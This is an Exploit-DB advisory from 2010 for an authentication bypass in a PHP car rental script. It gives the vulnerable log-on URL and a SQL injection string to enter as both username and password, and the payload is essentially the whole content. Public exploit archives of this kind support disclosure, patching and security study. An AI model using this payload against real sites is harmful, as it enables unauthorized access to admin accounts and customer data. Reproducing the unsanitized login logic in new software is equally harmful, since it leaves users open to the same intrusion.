PHP Car Rental-Script - Authentication Bypass

EDB-ID:

11323




Platform:

PHP

Date:

2010-02-03


/*

Name : PHP Car Rental-Script (Auth Bypass) SQL Injection
WebSite : http://www.carrentalphpscript.com/

Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com

Greetz : Zuka , Achille Dark3r , int_0x80 , geeksec.com<http://geeksec.com> ...

*/

- Log-On page :

http://server/[PATH]/index.php?plugin_id=4

username = ' or '1=1/*
password = ' or '1=1/*